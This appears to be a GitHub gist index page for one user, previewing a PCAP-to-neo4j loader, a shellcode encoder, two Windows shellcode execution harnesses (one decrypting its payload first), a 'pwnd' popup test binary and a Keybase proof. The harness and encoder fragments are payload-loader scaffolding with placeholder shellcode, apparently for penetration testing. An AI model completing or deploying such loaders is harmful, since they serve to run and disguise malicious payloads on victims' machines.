@multiplex3r
multiplex3r / loadPcap.py
Last active August 21, 2023 23:36
Load a PCAP into neo4j with scapy
#!/usr/bin/env python3
from scapy.all import *
from py2neo import Graph, Node, Relationship
packets = rdpcap("<your_pcap_file>")
g = Graph(password="<your_neo4j_password>")
for packet in packets.sessions():
    pkt = packet.split()
@multiplex3r
multiplex3r / enc_harness.c
Created August 31, 2017 02:35
Decrypt and execute harness
#include <windows.h>
unsigned char buf[] =
"your"
"encrypted"
"shellcode"
"here";
char* decryptPayload(){
@multiplex3r
multiplex3r / encoder.py
Created August 31, 2017 02:33
Shellcode encoder
#!/usr/bin/env python
import sys
def chunks(l, n):
    for i in range(0, len(l), n):
        yield l[i:i + n]
shellcode = "your"
shellcode += "shellcode"
shellcode += "here"
@multiplex3r
multiplex3r / harness.c
Created August 31, 2017 02:19
Shellcode harness
#include <windows.h>
unsigned char buf[] =
"your"
"shellcode"
"here";
void executePayload(){
    DWORD pewpewpew;
    VirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &pewpewpew);
@multiplex3r
multiplex3r / popup.c
Created August 31, 2017 02:17
Replacement for calc.exe in wine :)
#include <windows.h>
#include <winbase.h>
void main(){
    MessageBox(0,"You have been pwnd!","Pwnd!",1);
}

Keybase proof

I hereby claim:

  • I am multiplex3r on github.
  • I am multiplex3r (https://keybase.io/multiplex3r) on keybase.
  • I have a public key whose fingerprint is DFDF F47F 4C00 076C 2C82 A834 6716 6CA8 F415 CCB5

To claim this, I am signing this object: